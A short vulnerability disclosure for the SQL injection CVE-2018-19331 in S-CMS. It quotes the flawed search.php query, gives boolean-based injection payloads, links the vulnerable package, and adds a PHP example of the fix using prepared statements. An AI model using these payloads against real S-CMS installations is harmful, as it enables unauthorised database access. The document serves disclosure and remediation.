
The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php line 155

Vulnerable code:
$sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";

Exp:
%' AND 1=1 AND '%'='
%' AND 1=2 AND '%'='

Because $keyword is concatenated directly into the query string, an attacker can place arbitrary SQL between the two ANDs and use the difference in results (1=1 versus 1=2) to query the database.
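The following is an added example, not S-CMS code, showing the query from search.php beside a parameterised replacement that removes the injection. It assumes a PDO connection ($pdo) to the S-CMS database; the table and column names (SL_text, T_title, T_content, T_id) are the ones on the page, and the function names are chosen here for illustration.

```php
<?php
// Added example (not part of S-CMS). Shows why the original query is
// injectable and how a prepared statement with bound parameters fixes it.

// Vulnerable form, as found in search.php: the user-controlled keyword is
// spliced into the SQL text, so a value like  %' AND 1=2 AND '%'='
// rewrites the WHERE clause instead of being matched as text.
function buildVulnerableSql(string $keyword): string
{
    return "select * from SL_text where (T_title like '%" . $keyword
        . "%' or T_content like '%" . $keyword . "%' ) order by T_id desc";
}

// Hardened form. The keyword is sent as a bound parameter, so quotes and
// AND/OR inside it are ordinary characters to the LIKE comparison, never
// SQL. User-typed LIKE wildcards (% and _) are escaped too, so a keyword
// of "%" cannot silently turn into "match everything".
// The '!' escape character is chosen here for readability; '!' itself is
// escaped first so the replacement order is safe.
function likePattern(string $keyword): string
{
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $keyword);
    return '%' . $escaped . '%';
}

function searchTexts(PDO $pdo, string $keyword): array
{
    $pattern = likePattern($keyword);
    // Two distinct placeholders: some PDO drivers reject reusing one name
    // when native (non-emulated) prepares are enabled.
    $stmt = $pdo->prepare(
        "SELECT * FROM SL_text
          WHERE (T_title LIKE :p1 ESCAPE '!' OR T_content LIKE :p2 ESCAPE '!')
          ORDER BY T_id DESC"
    );
    $stmt->bindValue(':p1', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':p2', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Illustration with the page's payload: in the vulnerable builder the
// payload becomes part of the SQL; in the hardened path it becomes the
// literal pattern  %!%' AND 1=2 AND '!%'=%  and matches nothing unusual.
$payload = "%' AND 1=2 AND '%'=";
echo buildVulnerableSql($payload), PHP_EOL;
echo likePattern($payload), PHP_EOL;
```

Assuming the connection is created with PDO::ATTR_EMULATE_PREPARES set to false, the keyword never touches the SQL parser; with emulation on, PDO still quotes the bound value correctly, so either setting closes this injection.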

